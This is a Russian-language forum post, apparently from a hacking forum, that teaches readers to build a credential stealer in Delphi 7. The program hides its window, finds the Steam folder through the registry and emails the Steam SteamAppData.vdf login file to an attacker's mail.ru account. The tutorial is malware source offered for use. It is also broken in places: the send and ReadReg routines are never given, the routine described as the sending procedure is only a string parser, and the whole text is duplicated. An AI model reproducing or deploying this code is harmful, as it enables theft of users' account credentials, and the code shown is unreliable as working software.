Каратель12
Юзер
Каратель12
Юзер
- 21 Окт 2015
- 299
- 102
Всем привет.
Сегодня мы будем писать свой стиллер на Delphi 7.
Он будет весить примерно ~800 кб
Нам нужно будет реализовать:
1. Поиск папки стима и самого файла с пассами
2. Отправка файла на почту.
Откроем Delphi 7.
Создадим проект.
Чтобы формы не было при открытии стиллера добавим строку.
Код:
Application.ShowMainForm:= False;
Для работы с реестром в Uses пропишем Registry;
Добавим компонент IdAntiFreeze из вкладки IndyMisc
Добавим переменные
Код:
m:TIdMessage;
sm:tidsmtp;
att:tidattachment;
Создадим процедуру для коннекта и отправки файла
Код:
function Pars(TextIn, Text, TextOut: string): string;
var
TempStr: string;
begin
Result := '';
TempStr := Text;
TempStr := Copy(TempStr, Pos(TextIn, TempStr) +1, Length(TempStr));
Delete(TempStr, Pos(TextOut, TempStr), Length(TempStr));
Result := TempStr;
end;
Кликаем 2 раза по форме
Применим процедуры
Код:
procedure TForm1.FormCreate(Sender: TObject);
var
regpath, path:string;
begin
regpath:=ReadReg(HKEY_CURRENT_USER,'Steam','\Software\Microsoft\Windows\CurrentVersion\Run');
path:=Pars('"',regpath, '"');
path:=ExtractFilePath(path)+'config\SteamAppData.vdf';
send(path, 'логин@mail.ru', 'пароль', 'Куда слать@mail.ru');
end;
С кодом мы закончили.
Теперь приступим с изменению иконки и компиляции.
Чтобы изменить иконку надо
Сохраним проект.
File -> Save as -> Обязательно выберите отдельную папку.
Компилируем
Сам exe файл сохранен в вашу папку с проектом.
Стиллер готов.
Сегодня мы будем писать свой стиллер на Delphi 7.
Он будет весить примерно ~800 кб
Нам нужно будет реализовать:
1. Поиск папки стима и самого файла с пассами
2. Отправка файла на почту.
Откроем Delphi 7.
Создадим проект.

Чтобы формы не было при открытии стиллера добавим строку.

Код:
Application.ShowMainForm:= False;
Для работы с реестром в Uses пропишем Registry;

Добавим компонент IdAntiFreeze из вкладки IndyMisc

Добавим переменные

Код:
m:TIdMessage;
sm:tidsmtp;
att:tidattachment;
Создадим процедуру для коннекта и отправки файла

Код:
function Pars(TextIn, Text, TextOut: string): string;
var
TempStr: string;
begin
Result := '';
TempStr := Text;
TempStr := Copy(TempStr, Pos(TextIn, TempStr) +1, Length(TempStr));
Delete(TempStr, Pos(TextOut, TempStr), Length(TempStr));
Result := TempStr;
end;
Кликаем 2 раза по форме


Применим процедуры

Код:
procedure TForm1.FormCreate(Sender: TObject);
var
regpath, path:string;
begin
regpath:=ReadReg(HKEY_CURRENT_USER,'Steam','\Software\Microsoft\Windows\CurrentVersion\Run');
path:=Pars('"',regpath, '"');
path:=ExtractFilePath(path)+'config\SteamAppData.vdf';
send(path, 'логин@mail.ru', 'пароль', 'Куда слать@mail.ru');
end;
С кодом мы закончили.
Теперь приступим с изменению иконки и компиляции.
Чтобы изменить иконку надо


Сохраним проект.
File -> Save as -> Обязательно выберите отдельную папку.
Компилируем

Сам exe файл сохранен в вашу папку с проектом.
Стиллер готов.